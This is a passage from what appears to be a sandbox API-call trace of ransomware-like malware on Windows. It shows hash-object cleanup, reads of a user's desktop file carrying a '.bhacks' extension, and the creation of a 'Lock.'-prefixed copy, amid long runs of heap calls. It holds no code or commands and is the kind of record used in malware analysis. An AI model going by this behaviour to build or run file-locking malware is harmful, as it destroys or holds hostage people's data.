lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0104.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6ee0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0104.719] CryptDestroyHash (hHash=0x9a3b80) returned 1 [0104.719] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Tab3I0y Y3.avi.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\tab3i0y y3.avi.bhacks"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x44c [0104.719] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.719] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0104.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7060 [0104.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0104.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0104.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0104.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0104.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0104.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0104.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0104.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0104.720] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0104.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0104.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0104.720] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0104.720] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0104.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0104.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0104.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0104.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0104.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0104.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0104.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0104.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0104.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0104.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0104.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0104.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0104.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0104.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0104.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0104.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0104.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0104.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0104.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75150 [0104.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0104.721] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0104.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75150 | out: hHeap=0x2af0000) returned 1 [0104.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0104.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0104.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2abe880 [0104.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0104.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0104.795] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.Tab3I0y Y3.avi.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.tab3i0y y3.avi.bhacks"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0104.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70e0 [0104.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0104.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0104.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0104.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0104.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0104.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0104.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0104.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0104.796] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0104.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0104.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0104.796] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0104.796] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0104.796] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0104.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0104.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0104.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0104.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0104.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0104.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0104.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0104.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0104.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0104.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0104.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0104.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0104.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0104.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0104.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0104.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0104.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0104.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0104.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0104.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0104.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0104.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0104.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0104.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0104.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0104.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0104.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0104.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0104.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0104.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0104.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4ca2020 [0104.846] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0104.846] ReadFile (in: hFile=0x44c, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x7be0, lpOverlapped=0x0) returned 1 [0104.847] ReadFile (in: hFile=0x44c, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0104.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0104.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0104.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0104.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0104.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x7be0) returned 0x2a7a130 [0104.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4ca2020 | out: hHeap=0x2af0000) returned 1 [0104.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0104.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0104.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0104.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0104.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0104.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0104.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0104.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0104.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x7be0) returned 0x2a81d18 [0104.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0104.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0104.852] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0104.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0104.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0104.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0104.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0104.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x7be0) returned 0x2a7a130 [0104.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0104.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0104.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0104.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0104.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0104.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0104.852] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0104.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0104.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0104.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0104.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0104.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0104.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0104.852] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0104.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0104.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0104.852] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0104.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0104.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0104.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0104.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72778 [0104.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0104.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0104.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0104.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0104.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x7be0) returned 0x2a7a130 [0104.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0104.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a08 [0104.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0104.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0104.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0104.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b08 [0104.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0104.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0104.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0104.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b18 [0104.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0104.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0104.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0104.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9718 [0104.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0104.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0104.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0104.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0104.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0104.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0104.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0104.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x7be0) returned 0x2a89900 [0104.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0104.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0104.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0104.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0104.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0104.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0104.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0104.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0104.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0104.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0104.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0104.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0104.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0104.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0104.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0104.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0104.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0104.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0104.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0104.854] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0104.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0104.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0104.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0104.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0104.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0104.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0104.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0104.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0104.855] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0104.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0104.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0104.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0104.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0104.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0104.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0104.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0104.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0104.855] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0104.855] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0104.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0104.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0104.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0104.855] RtlAllocateHeap 